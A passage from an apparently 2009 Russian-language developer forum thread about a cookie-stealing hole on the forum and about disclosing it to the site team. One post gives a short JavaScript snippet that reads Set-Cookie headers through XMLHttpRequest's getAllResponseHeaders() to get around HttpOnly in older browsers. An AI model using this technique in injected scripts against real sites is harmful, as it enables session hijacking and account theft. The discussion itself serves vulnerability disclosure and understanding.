Здравствуйте, der Igel, Вы писали:
DI>Здравствуйте, 0K, Вы писали:
0K>> Следовательно, могу стырить кукисы любого из вас и вы даже не узнаете об этом.
DI>Действительно не узнаем, так как кукисы HttpOnly и в нормальных браузерах из скрипта их не получить.
Все не так просто. HttpOnly обходится получением потрохов заголовка Set-Cookie через аяксовые getAllResponseHeaders() или getResponseHeader()
var req = null;
try { req = new XMLHttpRequest(); } catch(e) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}
req.open('GET', 'http://rsdn.ru', false);
req.send(null);
alert(req.getAllResponseHeaders());
алерт покажет тебе все заголовки запроса, и, в случае с IE == v6/v7/v8, FF < v3.5 и возможно, с некоторыми другими, там окажется и Set-Cookie у которых установлен httponly
Гарантировано это не работает только в FF >=v3.5, Opera >= 9.0 и Chrome любых версий.
Здравствуйте, 0K, Вы писали:
0K>Какие есть идеи?
У меня есть идея-контрпредложение: сколько баллов ты готов отдать за то, чтобы броузер конкретно на твоем компе, сейчас не выполнил скрипт, эксплуатирующий 0-day уязвимость и выполняющий произвольный код с правами твоего пользователя?
Шучу конечно, но хочу напомнить, что в каждой шутке...
Здравствуйте, kochetkov.vladimir, Вы писали:
KV>У меня есть идея-контрпредложение: сколько баллов ты готов отдать за то, чтобы броузер конкретно на твоем компе, сейчас не выполнил скрипт, эксплуатирующий 0-day уязвимость и выполняющий произвольный код с правами твоего пользователя?
В IE 8 и FF 3 кукисы получал.
Дырку то уже залатали?
Здравствуйте, 0K, Вы писали:
0K>Так вот, занимаясь построением безопасного HTML-редактора
А вот с этого места можно поподробнее, если не секрет? Что за редактор? Проект открытый, глянуть можно?
0K>Теперь вопрос. Сколько баллов просить за отправку этой информации команде RSDN
Ну, террорист, если тебе от этого
станет легчеАвтор: 0K
Дата: 26.07.09
.
